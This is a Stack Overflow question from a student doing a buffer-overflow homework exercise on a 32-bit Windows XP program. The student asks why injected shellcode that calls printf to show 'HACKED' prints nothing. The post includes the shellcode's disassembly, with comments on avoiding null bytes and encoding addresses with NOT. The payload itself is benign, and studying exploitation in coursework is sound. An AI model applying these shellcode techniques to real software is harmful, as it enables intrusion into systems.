Printf in assembler doesn't print

Posted by Gaim on Stack Overflow See other posts from Stack Overflow or by Gaim
Published on 2010-04-27T06:45:14Z Indexed on 2010/04/27 7:53 UTC

Hi there, I have got a homework assignment to hack a program using a buffer overflow (with disassembling; the program was written in C++ and I haven't got the source code). I have already managed it, but I have a problem. I have to print some message on the screen, so I found out the address of the printf function, pushed the address of "HACKED" and the address of "%s" on the stack (in this order) and called that function. The called code ran fine, but nothing was printed.

I have tried to simulate the environment like in another place in the program, but there has to be something wrong. Do you have any idea what I am doing wrong that I have no output, please? Thanks a lot.

EDIT:

This program is running on Windows XP SP3 32-bit, written in C++, Intel asm.

Here is the "hack" code:

CPU Disasm
Address   Hex dump          Command                                  Comments
0012F9A3    90              NOP                                      ;hack begins
0012F9A4    90              NOP
0012F9A5    90              NOP
0012F9A6    89E5            MOV EBP,ESP
0012F9A8    83EC 7F         SUB ESP,7F                               ;creating a place for working data
0012F9AB    83EC 7F         SUB ESP,7F
0012F9AE    31C0            XOR EAX,EAX
0012F9B0    50              PUSH EAX
0012F9B1    50              PUSH EAX
0012F9B2    50              PUSH EAX
0012F9B3    89E8            MOV EAX,EBP
0012F9B5    83E8 09         SUB EAX,9
0012F9B8    BA 1406EDFF     MOV EDX,FFED0614                            ;address to jump, it is negative because there mustn't be 00 bytes
0012F9BD    F7DA            NOT EDX
0012F9BF    FFE2            JMP EDX                                     ;I have to jump because there are some values overwritten by the program
0012F9C1    90              NOP
0012F9C2    0090 00000000   ADD BYTE PTR DS:[EAX],DL
0012F9C8    90              NOP
0012F9C9    90              NOP
0012F9CA    90              NOP
0012F9CB    90              NOP
0012F9CC    6C              INS BYTE PTR ES:[EDI],DX                 ; I/O command
0012F9CD    65:6E           OUTS DX,BYTE PTR GS:[ESI]                ; I/O command
0012F9CF    67:74 68        JE SHORT 0012FA3A                        ; Superfluous address size prefix
0012F9D2    2069 73         AND BYTE PTR DS:[ECX+73],CH
0012F9D5    203439          AND BYTE PTR DS:[EDI+ECX],DH
0012F9D8    34 2C           XOR AL,2C
0012F9DA    2066 69         AND BYTE PTR DS:[ESI+69],AH
0012F9DD    72 73           JB SHORT 0012FA52
0012F9DF    74 20           JE SHORT 0012FA01
0012F9E1    3120            XOR DWORD PTR DS:[EAX],ESP
0012F9E3    6C              INS BYTE PTR ES:[EDI],DX                 ; I/O command
0012F9E4    696E 65 7300909 IMUL EBP,DWORD PTR DS:[ESI+65],-6F6FFF8D
0012F9EB    90              NOP
0012F9EC    90              NOP
0012F9ED    90              NOP
0012F9EE    31DB            XOR EBX,EBX                             ; hack continues
0012F9F0    8818            MOV BYTE PTR DS:[EAX],BL               ; writing 00 behind word "HACKED"
0012F9F2    83E8 06         SUB EAX,6
0012F9F5    50              PUSH EAX  ; address of "HACKED"
0012F9F6    B8 3B8CBEFF     MOV EAX,FFBE8C3B
0012F9FB    F7D0            NOT EAX
0012F9FD    50              PUSH EAX   ; address of "%s"
0012F9FE    B8 FFE4BFFF     MOV EAX,FFBFE4FF
0012FA03    F7D0            NOT EAX
0012FA05    FFD0            CALL EAX    ;address of printf

This code is really ugly because I am new to assembler, and there mustn't be any null bytes because of the buffer-overflow bug.

